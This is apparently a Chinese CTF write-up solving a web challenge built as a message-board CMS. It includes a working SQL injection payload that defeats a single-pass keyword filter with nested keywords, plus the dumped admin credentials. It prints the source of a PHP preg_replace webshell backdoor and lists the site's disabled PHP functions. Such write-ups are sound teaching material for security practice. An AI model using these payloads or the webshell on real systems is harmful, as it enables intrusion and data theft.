[Xlcteam](Web)Xlcteam客户留言板
2017-11-02 本文已影响231人
王一航
题目地址 :
http://cms.nuptzj.cn
查看源码发现 :
image.png
似乎是个任意文件下载
image.png
可以注入 , 只要不使用单引号 , 双引号这些会被 mysql_real_escape_string 这个函数过滤掉的字符即可
之前对用户输入还调用了 antiinject 这个函数进行过滤
通过任意文件读取漏洞读到该函数的源码
antiinject.php
<?php
function antiinject($content){
$keyword=array('select','union','and','from',' ',''',';',''','char','or','count','master','name','pass','admin','+','-','order','=');
$info=strtolower($content);
for($i=0;$i<=count($keyword);$i++){
$info=str_replace($keyword[$i], '',$info);
}
return $info;
}
?>
把 union/select 等关键字替换成空了 , 但是只替换了一次 , 那么 seselectlect 这样就可以绕过
所以 Payload 如下 :
image.png
soid=1/**/ununionion/**/seleselectct/**/1,2,3,4/**/limit/**/1,1
表名 :
admin
username
userpass
admin, 102 117 99 107 114 117 110 116 117
filename
id
path
1,compass.php
2,arlogined.php
hackerip
message
say
nice
image.png
拿到后台用户名和密码 :
admin/fuckruntu
image.png
在这里拿到后台地址 :
image.png
image.png
再读一下小马的源码 , 发现是 php 的 preg_replace 后门 , 利用即可
<?php
$e = $_REQUEST['www'];
$arr = array($_POST['wtf'] => '|.*|e',);
array_walk($arr, $e, '');
?>
image.png
但是似乎禁用了很多函数 :
image.png
symlink
link
exec
system
escapeshellcmd
escapeshellarg
passthru
shell_exec
proc_open
proc_close
proc_terminate
proc_get_status
proc_nice
dl
pclose
popen
stream_socket_server
stream_socket_accept
stream_socket_pair
stream_wrapper_restore
mail
mb_send_mail
posix_kill
apache_child_terminate
apache_lookup_uri
apache_reset_timeout
apache_setenv
virtual
socket_create
socket_create_pair
realpath_cache_get
opcache_compile_file
opcache_get_configuration
opcache_get_status
opcache_invalidate
opcache_is_script_cached
opcache_reset symlink
link
exec
system
escapeshellcmd
escapeshellarg
passthru
shell_exec
proc_open
proc_close
proc_terminate
proc_get_status
proc_nice
dl
pclose
popen
stream_socket_server
stream_socket_accept
stream_socket_pair
stream_wrapper_restore
mail
mb_send_mail
posix_kill
apache_child_terminate
apache_lookup_uri
apache_reset_timeout
apache_setenv
virtual
socket_create
socket_create_pair
realpath_cache_get
opcache_compile_file
opcache_get_configuration
opcache_get_status
opcache_invalidate
opcache_is_script_cached
opcache_reset
只能手动来绕过被禁用的函数拿到 flag 了
参考文章 :
image.png
Array
(
[0] => .
[1] => ..
[2] => about.php
[3] => antiinject.php
[4] => antixss.php
[5] => config.php
[6] => index.php
[7] => list.php
[8] => loginxlcteam
[9] => passencode.php
[10] => preview.php
[11] => say.php
[12] => sm.txt
[13] => so.php
[14] => xlcteam.php
[15] => 恭喜你获得flag2.txt
)
Array
(
[0] => .
[1] => ..
[2] => arlogined.php
[3] => conpass.php
[4] => index.php
)
image.png
继续利用 file_get_contents
image.png
<?php
//后台登陆
include './../config.php';
include './../passencode.php';
session_start();
$username=$_POST['username'];
$userpass=$_POST['userpass'];
if($username=="" || $userpass==""){
echo "<script>alert('用户名或密码不能为空!');window.location = './index.php'</script>";
exit();
}
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error());
mysql_select_db($db_name,$con);
$username=mysql_real_escape_string($username);
$userpass=passencode($userpass);
$result=mysql_query("SELECT * FROM admin WHERE username='$username'",$con);
//知道我写这个存在漏洞的密码验证算法浪费了多少时间么?! 哭~
if(mysql_num_rows($result)<=0){
echo "<script>alert('用户名不存在');window.location = './index.php'</script>";
mysql_free_result($result);
mysql_close($con);
exit();
}
while($rs=mysql_fetch_array($result)){
if($rs['username']==$username){
if(strlen($userpass)!=strlen($rs['userpass'])){
echo "<script>alert('密码错误:长度不一致!');window.location = './index.php'</script>";
mysql_free_result($result);
mysql_close($con);
exit();
}
}
for($i=0;$i<=strlen($userpass);++$i){
if(strncmp($userpass,$rs['userpass'],$i)!=0){
echo "<script>alert('密码错误:比较第 $i 位错误!');window.location = './index.php'</script>";
break;
}else{
if($i==strlen($userpass)){
$_SESSION['state']="已登录";
setcookie('username','');
setcookie('userpass','');
setcookie('username',"$username",time()+1200,"/");
setcookie('userpass',"$userpass",time()+1200,"/");
$file=mysql_query("SELECT * FROM filename where id=2");
$path=mysql_fetch_array($file);
echo "<script>window.location = '".$path['path']."'</script>";
mysql_free_result($result);
mysql_free_result($file);
mysql_close($con);
exit();
}
}
}
mysql_free_result($result);
mysql_close($con);
}
?>
<?php
session_start();
if(!isset($_SESSION['state'])){
echo "<script>alert('请先登陆!');window.location = './index.php'</script>";
exit();
}else{
if($_SESSION['state']!="已登录"){
echo "<script>alert('请先登陆!');window.location = './index.php'</script>";
exit();
}
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Xlcteam留言板系统后台</title>
</head>
<body>
<center>
<h1>恭喜你已拿下后台,离爆菊只差一步了flag1:nctf{}</h1>
<p> </p>
<hr />
<h3>能来到这里,相信也不是只会用工具的脚本小子了</h3>
<h3>现在离爆菊只差一步了</h3>
<hr />
<h3>因为程序猿连后台都懒得开发了,为了方便管理,他邪恶地放了一个一句话木马在网站的根目录下<br />
小马的文件名为:xlcteam.php
<?php /*
include './../config.php';
$con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库!!".mysql_error());
mysql_select_db($db_name,$con);
mysql_query("set names gb2312");
$file=mysql_query("SELECT * FROM filename where id=3");
$filename=mysql_fetch_array($file);
echo $filename['name'];*/
?>
</h3>
<hr />
<h4>黑阔,哎哟~不错哦
</h4>
</center>
</body>
</html>
